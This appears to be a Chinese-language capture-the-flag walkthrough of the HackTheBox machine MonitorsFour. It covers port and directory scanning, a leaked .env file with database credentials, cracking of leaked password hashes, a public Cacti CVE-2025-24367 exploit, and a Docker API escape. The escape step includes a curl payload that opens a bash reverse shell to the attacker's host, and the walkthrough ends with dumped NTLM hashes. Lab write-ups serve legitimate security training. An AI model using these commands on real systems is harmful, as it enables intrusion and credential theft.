基本信息

https://app.hackthebox.com/machines/MonitorsFour
10.10.11.98

端口扫描

80和5985:

$ nmap -sC -sV -Pn 10.10.11.98
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-13 13:04 JST
Nmap scan report for 10.10.11.98
Host is up (0.079s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx
|_http-title: Did not follow redirect to http://monitorsfour.htb/
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.71 seconds

80

需要加hosts：

1	10.10.11.98 monitorsfour.htb

网络解决方案相关的公司官网：

目录扫描

目录扫描发现env文件泄漏，以及user，login之类：

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://monitorsfour.htb/

/.env                 (Status: 200) [Size: 97]
/contact              (Status: 200) [Size: 367]
/controllers          (Status: 301) [Size: 162] [--> http://monitorsfour.htb/controllers/]
/forgot-password      (Status: 200) [Size: 3099]
/login                (Status: 200) [Size: 4340]
/static               (Status: 301) [Size: 162] [--> http://monitorsfour.htb/static/]
/user                 (Status: 200) [Size: 35]
/views                (Status: 301) [Size: 162] [--> http://monitorsfour.htb/views/]

.env

env文件中得到数据库连接相关信息：

$ curl http://monitorsfour.htb/.env
DB_HOST=mariadb
DB_PORT=3306
DB_NAME=monitorsfour_db
DB_USER=monitorsdbuser
DB_PASS=f37p2j8f4t0r

user

直接访问user提示缺少token参数：

简单尝试几次，发现当token为0时，得到一些user信息：

admin        56b32eb43e6f15395f6c46c1c9e1cd36
mwatson      69196959c16b26ef00b77d82cf6eb169
janderson    2a22dcf99190c322d974c8df5ba3256b
dthompson    8d4a7e7fd08555133e056d9aacb1e519

可以破解出admin的密码：

1
2
3

sudo hashcat -m 0 hash.txt ~/Tools/dict/rockyou.txt

56b32eb43e6f15395f6c46c1c9e1cd36:wonderful1

使用admin账号密码可以登录,暂时没什么用：

子域名扫描

子域名扫描可以发现cacti：

1
2
3

ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://monitorsfour.htb/" -H "Host: FUZZ.monitorsfour.htb" -fs 138

cacti                   [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 82ms]

cacti

添加hosts后访问，就是cacti，1.2.28：

需要登录，使用前面得到的用户名密码进行组合尝试，可以发现正确用户名是admin的name，marcus：

1	marcus : wonderful1

CVE-2025-24367

搜索可以找到cacti相关漏洞：

TheCyberGeek/CVE-2025-24367-Cacti-PoC: Proof of Concept for CVE-2025-24367
https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC

一键打到www-data：

1	python3 exploit.py -u marcus -p wonderful1 -i 10.10.14.2 -l 4444 -url http://cacti.monitorsfour.htb

user flag

虽然是www-data,但已经可以读marcus用户目录：

Docker Escape & root flag

当前是在容器内，查看dns配置可以发现宿主机ip，以及常规端口很容易发现docker api未授权：

1
2
3

cat /etc/resolv.conf

192.168.65.7

所以就是利用api未授权挂载目录创建容器从而读取文件：

When a SSRF is enough: Full Docker Escape on Windows Docker Desktop (CVE-2025-9074)
https://blog.qwertysecurity.com/Articles/blog3

# 创建容器
curl -X POST \
  -H "Content-Type: application/json" \
  -d '{
    "Image":"docker_setup-nginx-php:latest",
    "Cmd":["bash","-c","bash -i >& /dev/tcp/10.10.14.2/4444 0>&1"],
    "HostConfig":{
      "Binds":["/mnt/host/c:/host_root"]
    }
  }' \
  -o create.json \
  http://192.168.65.7:2375/containers/create
  
# 获取容器cid
cid=$(cut -d'"' -f4 create.json)

# 启动我们创建的容器
curl -X POST \
  -d '' \
  http://192.168.65.7:2375/containers/$cid/start
# 启动后新容器执行了命令，获取到shell

root flag

之后读取挂载目录中文件即可：

hashdump

稍微麻烦点，替换他自动清理用的文件，获取windows shell：

root@f016cf80b807:/host_root/users/Administrator/Documents# cp shell.ps1 db_cleanup.ps1

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:41f4136faf5a06a6765a8fcea8870225:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
marcus:1001:aad3b435b51404eeaad3b435b51404ee:855eb9bc4a3c8030a1450fd958937acb:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::

参考资料

TheCyberGeek/CVE-2025-24367-Cacti-PoC: Proof of Concept for CVE-2025-24367
https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC
When a SSRF is enough: Full Docker Escape on Windows Docker Desktop (CVE-2025-9074)
https://blog.qwertysecurity.com/Articles/blog3

MonitorsFour - HackTheBox

2025-12-13